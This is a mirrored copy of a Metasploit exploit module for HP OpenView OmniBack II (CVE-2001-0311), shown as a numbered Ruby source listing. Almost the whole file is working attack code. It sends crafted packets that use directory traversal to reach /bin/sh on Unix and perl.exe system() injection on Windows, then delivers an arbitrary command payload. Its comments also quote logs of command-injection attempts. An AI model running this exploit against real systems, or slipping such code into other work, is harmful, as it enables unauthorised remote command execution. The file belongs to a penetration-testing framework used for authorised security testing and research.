Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/misc/openview_omniback_exec.rb
19515 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'HP OpenView OmniBack II Command Execution',

16
        'Description' => %q{

17
          This module uses a vulnerability in the OpenView Omniback II

18
          service to execute arbitrary commands. This vulnerability was

19
          discovered by DiGiT and his code was used as the basis for this

20
          module.

21


22
          For Microsoft Windows targets, due to module limitations, use the

23
          "unix/cmd/generic" payload and set CMD to your command. You can only

24
          pass a small amount of characters (4) to the command line on Windows.

25
        },

26
        'Author' => [ 'hdm', 'aushack' ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          ['CVE', '2001-0311'],

30
          ['OSVDB', '6018'],

31
          ['BID', '11032'],

32
          ['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],

33
        ],

34
        'Platform' => ['unix'], # win

35
        'Arch' => ARCH_CMD,

36
        'Privileged' => false,

37
        'Payload' => {

38
          'Space' => 1024,

39
          'DisableNops' => true,

40
          'Compat' =>

41
                        {

42
                          'PayloadType' => 'cmd',

43
                          'RequiredCmd' => 'generic perl telnet',

44
                        }

45
        },

46
        'Targets' => [

47
          [ 'Unix', {}],

48
          [ 'Windows', {}],

49
        ],

50
        'DisclosureDate' => '2001-02-28',

51
        'DefaultTarget' => 0,

52
        'Notes' => {

53
          'Reliability' => UNKNOWN_RELIABILITY,

54
          'Stability' => UNKNOWN_STABILITY,

55
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

56
        }

57
      )

58
    )

59


60
    register_options(

61
      [

62
        Opt::RPORT(5555)

63
      ]

64
    )

65
  end

66


67
  def check

68
    if (target.name =~ /Unix/)

69
      connect

70


71
      poof =

72
        "\x00\x00\x00.2" +

73
        "\x00 a" +

74
        "\x00 0" +

75
        "\x00 0" +

76
        "\x00 0" +

77
        "\x00 A" +

78
        "\x00 28" +

79
        "\x00/../../../bin/sh" +

80
        "\x00\x00" +

81
        "digit " +

82
        "AAAA\n\x00"

83


84
      sock.put(poof)

85
      sock.put("echo /etc/*;\n")

86
      res = sock.get_once(-1, 5)

87
      disconnect

88


89
      if !(res and res.length > 0)

90
        vprint_status("The remote service did not reply to our request")

91
        return Exploit::CheckCode::Safe

92
      end

93


94
      if (res =~ /passwd|group|resolv/)

95
        vprint_status("The remote service is exploitable")

96
        return Exploit::CheckCode::Vulnerable

97
      end

98


99
      return Exploit::CheckCode::Safe

100
    end

101


102
    if (target.name =~ /Windows/)

103
      connect

104


105
      poof =

106
        "\x00\x00\x00.2" +

107
        "\x00 a" +

108
        "\x00 0" +

109
        "\x00 0" +

110
        "\x00 0" +

111
        "\x00 A" +

112
        "\x00 28" +

113
        "\x00\\perl.exe" +

114
        "\x00\x20-e\x20system(dir)\x00\x00" +

115
        "digit " +

116
        "AAAA\n\x00"

117


118
      sock.put(poof)

119
      res = sock.get_once(-1, 5)

120
      disconnect

121


122
      print_status(res.to_s)

123


124
      if !(res and res.length > 0)

125
        print_status("The remote service did not reply to our request")

126
        return Exploit::CheckCode::Safe

127
      end

128


129
      if (res =~ /V.o.l.u.m.e/) # Unicode

130
        print_status("The remote service is exploitable")

131
        return Exploit::CheckCode::Vulnerable

132
      end

133


134
      return Exploit::CheckCode::Safe

135
    end

136
  end

137


138
  def exploit

139
    if (target.name =~ /Unix/)

140
      connect

141


142
      poof =

143
        "\x00\x00\x00.2" +

144
        "\x00 a" +

145
        "\x00 0" +

146
        "\x00 0" +

147
        "\x00 0" +

148
        "\x00 A" +

149
        "\x00 28" +

150
        "\x00/../../../bin/sh" +

151
        "\x00\x00" +

152
        "digit " +

153
        "AAAA\n\x00"

154


155
      sock.put(poof)

156
      sock.put(payload.encoded + ";\n")

157
      res = sock.get_once(-1, 5)

158


159
      if !(res and res.length > 0)

160
        print_status("The remote service did not reply to our request")

161
        disconnect

162
        return

163
      end

164


165
      print(res)

166


167
      handler

168
      disconnect

169
    end

170


171
    if (target.name =~ /Windows/)

172


173
      # aushack

174
      #

175
      # Tested during pen test against Windows 2003 server.

176
      # Windows Service details:

177
      # - Data Protector Inet

178
      # -> [HP OpenView Storage Data Protector] - Backup client service

179
      # -> "C:\Program Files\OmniBack\bin\omniinet.exe"

180
      # -> OmniInet service for Windows NT

181
      # -> File version: 6.0.0.0

182
      #

183
      # This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.

184
      #

185
      # Notes:

186
      # I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe

187
      # Perhaps a difference in Windows/Unix code? Logs:

188
      #

189
      # 11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384

190
      # A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client

191
      #

192
      # 11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384

193
      # [RxNtIntegUtil] parameter refused: ..\foo.exe

194
      #

195
      # 11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384

196
      # A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client

197
      #

198
      # 11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384

199
      # [RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:

200
      #

201
      # 11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384

202
      # A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client

203
      #

204
      # 11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384

205
      # [RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >

206


207
      connect

208


209
      poof =

210
        "\x00\x00\x00.2" +

211
        "\x00 a" +

212
        "\x00 0" +

213
        "\x00 0" +

214
        "\x00 0" +

215
        "\x00 A" +

216
        "\x00 28" +

217
        "\x00\\perl.exe" +

218
        "\x00\x20-esystem(#{payload.encoded})\x00\x00" +

219
        "digit " +

220
        "AAAA\n\x00"

221


222
      sock.put(poof)

223
      # sock.put(payload.encoded + "\n")

224
      res = sock.get_once(-1, 5)

225


226
      if !(res and res.length > 0)

227
        print_status("The remote service did not reply to our request")

228
        disconnect

229
        return

230
      end

231


232
      print(res)

233


234
      handler

235
      disconnect

236
    end

237
  end

238
end

239


240